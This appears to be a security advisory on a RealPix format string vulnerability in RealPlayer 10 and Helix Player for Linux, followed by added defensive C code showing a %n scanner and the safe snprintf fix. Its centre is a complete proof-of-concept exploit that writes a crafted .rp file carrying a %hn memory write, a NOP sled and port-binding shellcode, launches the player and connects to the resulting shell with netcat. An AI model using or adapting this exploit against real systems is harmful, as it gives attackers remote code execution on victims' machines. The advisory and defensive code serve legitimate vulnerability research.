RealNetworks RealPlayer and Helix Player Format String Handling Vulnerability
Affected systems:
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.4
Real Networks Helix Player for Linux 1.0.3
Real Networks Helix Player for Linux 1.0.2
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0
Real Networks RealPlayer For Unix 10.0.4
Real Networks RealPlayer For Unix 10.0.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14945
RealPlayer and Helix Player are widely used media players that support many media formats.
RealPlayer and Helix Player contain a format string vulnerability that a remote attacker can use to take control of the machine.
The cause is missing input validation: attribute values taken from a RealPix (.rp) file are handed to a formatted print function as the format string rather than as a data argument. An attacker who gets a victim to open a crafted file can therefore supply conversion specifiers directly, use %n-style writes to corrupt memory, and execute arbitrary code with the privileges of the player process.
<*Source: c0ntex (c0ntex@hushmail.com)
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER   10000                   /* size of the NOP sled + shellcode */
#define EBPMSB   64105                   /* value %hn writes into the high half of saved EBP */
#define HOST     "localhost"
#define NETCAT   "/bin/nc"
#define NOPS     0x90
#define STACKPOP 148                     /* positional argument reached by %148$hn */
#define VULN     "/usr/local/RealPlayer/realplay"

/* The file name is binary on purpose: it ends in ".rp" (\x2e\x72\x70) so the
 * player parses it as RealPix, and its leading bytes end up on the stack
 * where the format string can reach them. */
char filename[] = "\x56\x59\x14\x82\x26\x08\x2e\x72\x70";

/* metasploit port binding shellcode = 4444 */
char hellcode[] = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66"
                  "\x58\x99\x89\xe1\xcd\x80\x96\x43\x52"
                  "\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a"
                  "\x66\x58\x50\x51\x56\x89\xe1\xcd\x80"
                  "\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
                  "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a"
                  "\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
                  "\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68"
                  "\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89"
                  "\xe1\xcd\x80";

/* Write the malicious RealPix file. Takes ownership of shellcode and frees it. */
int
filegen(char *shellcode)
{
    FILE *rp;

    printf("[-] Creating file [%s]\n", filename);
    rp = fopen(filename, "w");
    if (!rp) {
        puts("[!] Could not fopen file!");
        free(shellcode);
        return EXIT_FAILURE;
    }
    printf("[-] Using [%d] stack pops\n[-] Modifying EBP MSB with value [%d]\n", STACKPOP, EBPMSB);

    /* handle="%.64105u%148$hn": the padded %u raises the output count to
     * EBPMSB and %hn stores it as a short through the 148th stack word;
     * name="findme<NOP sled><shellcode>" carries the payload. */
    fprintf(rp,
            "<imfl>\n"
            "<head\n"
            "duration=\"1:33.7\"\n"
            "timeformat=\"dd:hh:mm:ss.xyz\"\n"
            "preroll=\"1:33.7\"\n"
            "bitrate=\"1337\"\n"
            "width=\"69\"\n"
            "height=\"69\"\n"
            "aspect=\"\"\n"
            "url=\"http://www.open-security.org\"/>\n"
            "<image handle=\"%%.%du%%%d$hn\" name=\"findme%s\"/>\n"
            "<fadein start=\"0\" duration=\"0:01\" target=\"2\"/>\n"
            "</imfl>", EBPMSB, STACKPOP, shellcode);
    fclose(rp);
    free(shellcode);
    return EXIT_SUCCESS;
}

int
main(int argc, char **argv)
{
    char *shellcode = NULL;

    puts("\nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
    puts("Code tested on Debian 3.1 against RealPlayer 10 Gold's latest version");
    puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org\n");

    /* BUFFER + 1: the terminating NUL below is stored at index BUFFER
     * (the original allocated only BUFFER bytes and wrote one past the end) */
    shellcode = malloc(BUFFER + 1);
    if (!shellcode) {
        puts("[!] Could not malloc");
        return EXIT_FAILURE;
    }
    /* NOP sled with the bind shellcode at its tail */
    memset(shellcode, NOPS, BUFFER);
    memcpy(&shellcode[BUFFER - strlen(hellcode)], hellcode, strlen(hellcode));
    shellcode[BUFFER] = '\0';

    if (filegen(shellcode) != EXIT_SUCCESS)      /* filegen frees shellcode */
        return EXIT_FAILURE;
    puts("[-] Completed creation of test file!\n[-] Executing RealPlayer now...");

    switch (fork()) {
    case -1:
        puts("[!] Could not fork off, bailing!");
        return EXIT_FAILURE;
    case 0:
        /* child: open the crafted file in the vulnerable player */
        execl(VULN, "realplay", filename, (char *)NULL);
        puts("[!] Could not execute realplayer... :(");
        return EXIT_FAILURE;
    default:
        break;
    }

    /* parent: give the player time to parse the file, then connect to the bind shell */
    puts("[-] Connecting to shell in 10 seconds\n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
    sleep(10);
    execl(NETCAT, "nc", HOST, "4444", (char *)NULL);
    puts("[!] Could not connect, check the core file!");
    return EXIT_FAILURE;
}
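As an added illustration of the bug class (example code written for this page; it is neither c0ntex's exploit nor RealNetworks' code), the C program below pulls the handle and name attributes out of a RealPix fragment shaped like the file the PoC above generates, counts the printf conversions found in them and flags %n, and shows the vulnerable call beside the fixed one. rp_get_attr, scan_format_directives, log_name_unsafe and log_name_safe are hypothetical names; sample_rp is a constructed fragment that carries four NOP bytes in place of the real sled and shellcode.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed fragment in the shape the PoC writes: the attacker's format
 * string sits in the handle attribute, the payload (here four NOP bytes
 * standing in for the sled + shellcode) in the name attribute. */
static const char sample_rp[] =
    "<imfl>\n"
    "<head duration=\"1:33.7\" width=\"69\" height=\"69\"/>\n"
    "<image handle=\"%.64105u%148$hn\" name=\"findme\x90\x90\x90\x90\"/>\n"
    "</imfl>";

/* Copy the value of attribute attr from the first <image> tag of doc into
 * out. Returns the value length, or -1 if absent or too long.
 * Hypothetical helper; not the player's own parser. */
int rp_get_attr(const char *doc, const char *attr, char *out, size_t outlen)
{
    char key[64];
    const char *tag = strstr(doc, "<image ");
    if (!tag)
        return -1;
    const char *end = strchr(tag, '>');          /* stay inside this tag */
    if (!end)
        return -1;
    snprintf(key, sizeof key, " %s=\"", attr);
    const char *p = strstr(tag, key);
    if (!p || p > end)
        return -1;
    p += strlen(key);
    const char *q = strchr(p, '"');
    if (!q || (size_t)(q - p) >= outlen)
        return -1;
    memcpy(out, p, (size_t)(q - p));
    out[q - p] = '\0';
    return (int)(q - p);
}

/* Count printf conversions in s (a literal "%%" is not one) and report in
 * *writes whether any of them is %n, the conversion that turns a format
 * string bug into a memory write. Useful for triaging a suspicious .rp. */
int scan_format_directives(const char *s, int *writes)
{
    int n = 0;
    *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {                       /* escaped percent sign */
            p++;
            continue;
        }
        n++;
        /* skip positional index, flags, width, precision and length */
        const char *q = p + 1;
        while (*q && strchr("0123456789$.-+ #'*hlLqjzt", *q))
            q++;
        if (*q == 'n')
            *writes = 1;
        if (!*q)
            break;
        p = q;
    }
    return n;
}

/* The vulnerable pattern the advisory describes: attacker-controlled text
 * is the format argument, so %u pads the byte count and %hn writes it. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int log_name_unsafe(char *out, size_t outlen, const char *name)
{
    return snprintf(out, outlen, name);          /* BUG: name is the format */
}
#pragma GCC diagnostic pop

/* The fix: attacker data is only ever a %s argument, never the format. */
int log_name_safe(char *out, size_t outlen, const char *name)
{
    return snprintf(out, outlen, "%s", name);
}

int main(void)
{
    char attr[64], out[64];
    int writes;
    if (rp_get_attr(sample_rp, "handle", attr, sizeof attr) < 0)
        return 1;
    int n = scan_format_directives(attr, &writes);
    printf("handle=\"%s\": %d conversions, %%n write: %s\n",
           attr, n, writes ? "yes" : "no");
    log_name_safe(out, sizeof out, attr);
    printf("rendered safely: %s\n", out);
    return 0;
}
```

The scanner is a triage aid for files and logs, not a fix: stripping or rejecting '%' in untrusted data is fragile, and the only robust repair is the one log_name_safe shows, passing the data as an argument to a constant format. Building with -Wformat-security (or -Wformat=2) makes the compiler point at every call of the log_name_unsafe shape.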
Recommendations:
--------------------------------------------------------------------------------
Vendor patch:
Real Networks
-------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.real.com